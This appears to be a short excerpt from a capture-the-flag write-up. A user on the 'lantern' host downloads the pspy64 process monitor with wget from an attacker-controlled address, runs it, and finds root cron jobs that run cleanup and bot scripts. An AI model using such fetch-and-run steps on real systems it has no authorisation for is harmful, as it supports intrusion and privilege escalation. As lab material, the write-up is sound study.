PSPY
A root cronjob process was identified
tomas@lantern:/var/tmp$ wget http://10.10.15.34/pspy64 && chmod 755 ./pspy64
--2024-08-20 09:48:24-- http://10.10.15.34/pspy64
Connecting to 10.10.15.34:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3104768 (3.0M) [application/octet-stream]
Saving to: ‘pspy64’
pspy64 100%[======================>] 2.96M 579KB/s in 5.1s
2024-08-20 09:48:29 (596 KB/s) - ‘pspy64’ saved [3104768/3104768]Delivery complete
tomas@lantern:/var/tmp$ ./pspy64
pspy - version: v1.2.1 - Commit SHA: f9e6a1590a4312b9faa093d8dc84e19567977a6d
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scanning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
doneExecuting PSPY
The root cronjob process is executing some commands;
/usr/bin/rm /root/.automation.sh.swp/usr/bin/systemctl restart bot.service/bin/sh -c /root/cleanup.sh/usr/bin/expect -f /root/bot.exp/bin/sh /usr/sbin/service blazor-server restart